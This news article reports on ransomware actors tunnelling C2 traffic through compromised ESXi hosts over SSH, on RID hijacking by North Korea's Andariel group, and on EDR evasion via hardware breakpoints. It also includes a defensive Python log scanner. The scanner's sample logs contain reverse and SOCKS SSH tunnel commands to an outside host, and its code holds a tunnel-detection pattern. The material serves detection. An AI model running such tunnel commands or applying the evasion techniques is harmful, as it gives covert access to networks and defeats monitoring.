
Ransomware Attacks ESXi Systems through Covert SSH Tunnels for Command and Control Purposes


Cybersecurity researchers have uncovered a new trend in ransomware attacks targeting ESXi systems. Compromised ESXi hosts are now being used as a gateway to tunnel traffic to command-and-control (C2) infrastructure, allowing threat actors to operate stealthily within corporate networks. The researchers at Sygnia recently published a report highlighting this worrying development.

According to the researchers, threat actors are exploiting unmonitored ESXi appliances as a means of establishing persistence and gaining access to corporate networks. By using native tools like SSH to create a SOCKS tunnel between their C2 servers and the compromised environment, the attackers are able to blend in with legitimate network traffic, making it difficult for security controls to detect their activities.

In many incident response engagements, Sygnia found that ESXi systems were compromised either through the use of stolen admin credentials or by exploiting known security vulnerabilities. Once access is gained, threat actors set up tunnels using SSH or similar tools to create a semi-persistent backdoor within the network, ensuring long-term access without raising suspicion.

Monitoring ESXi logs is crucial in detecting and responding to these attacks. Sygnia recommends configuring log forwarding to capture relevant events in one centralized location for forensic analysis. Specifically, organizations should review log files such as /var/log/shell.log, /var/log/hostd.log, /var/log/auth.log, and /var/log/vobd.log to identify suspicious activities related to SSH tunneling on ESXi appliances.
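As an added illustration of the log review recommended above (example code, not from the Sygnia report or this article), the Python scanner below parses constructed lines in the shape of ESXi shell.log and auth.log entries, flags ssh commands that open a reverse, local or SOCKS tunnel, and flags successful SSH logins from outside an approved management network. The sample log lines, addresses and the allowed-network list are assumptions made for the example.

```python
import ipaddress
import re
import shlex
# Constructed sample lines in the shape of ESXi /var/log/shell.log and /var/log/auth.log.
SHELL_LOG = """\
2025-01-20T09:12:01Z shell[2100123]: [root]: esxcli network ip interface list
2025-01-20T09:13:44Z shell[2100123]: [root]: ssh -fN -R 9001:127.0.0.1:22 -o StrictHostKeyChecking=no svc@203.0.113.10
2025-01-20T09:14:02Z shell[2100123]: [root]: ssh -D 1080 -N ops@203.0.113.10
2025-01-20T09:15:10Z shell[2100123]: [root]: ssh backup@10.0.0.7 'df -h'
"""
AUTH_LOG = """\
2025-01-20T09:11:50Z sshd[2100120]: Accepted keyboard-interactive/pam for root from 203.0.113.10 port 51234 ssh2
2025-01-20T09:11:55Z sshd[2100121]: Accepted password for root from 10.0.0.50 port 40022 ssh2
"""
SHELL_RE = re.compile(r"^(?P<ts>\S+) shell\[\d+\]: \[(?P<user>[^\]]+)\]: (?P<cmd>.*)$")
AUTH_RE = re.compile(r"^(?P<ts>\S+) sshd\[\d+\]: Accepted \S+ for (?P<user>\S+) from (?P<src>\S+) port")
TUNNEL_OPTS = "RLDw"  # ssh options that forward traffic: reverse, local, dynamic (SOCKS), tun device

def tunnel_flags(cmd):
    """Return the forwarding option letters used by an ssh command ('' if none, or not ssh at all)."""
    try:
        argv = shlex.split(cmd)
    except ValueError:  # unbalanced quotes in the logged command: fall back to a naive split
        argv = cmd.split()
    if not argv or argv[0].rsplit("/", 1)[-1] != "ssh":
        return ""
    flags = ""
    for tok in argv[1:]:
        m = re.match(r"-([A-Za-z]+)", tok)  # short options, possibly bundled (-fNR) or attached (-R9001:...)
        if m:
            flags += "".join(c for c in m.group(1) if c in TUNNEL_OPTS)
    return flags

def scan_shell_log(text):
    """Flag shell.log commands that open an SSH tunnel from the ESXi host."""
    hits = []
    for line in text.splitlines():
        m = SHELL_RE.match(line)
        if m and (flags := tunnel_flags(m["cmd"])):
            hits.append({"ts": m["ts"], "user": m["user"], "flags": flags, "cmd": m["cmd"]})
    return hits

def scan_auth_log(text, allowed_nets):
    """Flag successful SSH logins whose source is outside the approved management networks."""
    hits = []
    for line in text.splitlines():
        m = AUTH_RE.match(line)
        if m and not any(ipaddress.ip_address(m["src"]) in ipaddress.ip_network(n) for n in allowed_nets):
            hits.append({"ts": m["ts"], "user": m["user"], "src": m["src"]})
    return hits
```

Run the two scanners over forwarded copies of the logs and correlate a flagged login source with the remote host in a flagged tunnel command; that pairing is the pattern the report describes.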

In a separate development, the Andariel group, linked to North Korea, has been observed using a technique known as Relative Identifier (RID) hijacking to achieve persistence in Windows environments. This method involves covertly modifying the Windows Registry so that a guest or low-privileged account receives administrative permissions at its next login. By abusing this technique, threat actors can perform malicious actions without detection, taking advantage of the limited monitoring applied to regular user accounts.

To execute RID hijacking successfully, adversaries must have already compromised a machine and gained administrative or SYSTEM privileges. This enables them to change the RID value of a standard account to that of the Administrator account, granting elevated privileges without triggering alerts.

Meanwhile, researchers have identified a new technique for evading Endpoint Detection and Response (EDR) systems by leveraging hardware breakpoints. By using the NtContinue function instead of SetThreadContext, attackers can avoid triggering Event Tracing for Windows (ETW) detections, effectively bypassing EDR telemetry that relies on SetThreadContext for monitoring suspicious activities. This approach enables threat actors to manipulate telemetry in userland without direct kernel patching, posing a challenge to traditional defense mechanisms.

Overall, these developments underscore the evolving tactics of cybercriminals and the need for organizations to enhance their cybersecurity measures to effectively detect and respond to advanced threats. By staying vigilant and adopting proactive security measures, businesses can mitigate the risks posed by ransomware, RID hijacking, and EDR evasion techniques.
